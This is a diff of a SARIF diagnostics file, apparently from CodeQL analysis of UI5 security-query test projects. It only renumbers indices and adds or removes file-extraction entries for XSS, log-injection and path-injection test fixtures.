"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 164 } @@ -7300,7 +7354,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -7312,7 +7366,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", "uriBaseId" : "%SRCROOT%", "index" : 165 } @@ -7326,7 +7380,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7338,7 +7392,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 166 } @@ -7352,33 +7406,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7390,7 +7418,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", "uriBaseId" : "%SRCROOT%", "index" : 167 } 
@@ -7404,7 +7432,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7416,7 +7444,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 168 } @@ -7430,7 +7458,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7442,7 +7470,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 169 } @@ -7456,7 +7484,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7468,7 +7496,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 170 } @@ -7482,7 +7510,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -7494,7 +7522,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 171 } @@ -7508,7 +7536,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7520,7 +7548,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 172 } @@ -7534,7 +7562,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7546,7 +7574,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 173 } @@ -7560,7 +7588,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7572,7 +7600,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 174 } 
@@ -7586,7 +7614,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7598,7 +7626,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } @@ -7612,7 +7640,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7624,7 +7652,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 176 } @@ -7638,7 +7666,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7650,7 +7678,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 177 } @@ -7664,7 +7692,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7676,7 +7704,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } 
@@ -7690,7 +7718,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -7698,18490 +7726,1124 @@ "text" : "" } } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 180 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 181 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 182 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : 
{ - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 183 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 186 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 187 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 189 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 190 - } - } - } ], - "message" : { - "text" : "" 
- }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 191 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 
194 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : 
"%SRCROOT%", - "index" : 198 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 203 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, 
{ - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : 
{ - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - 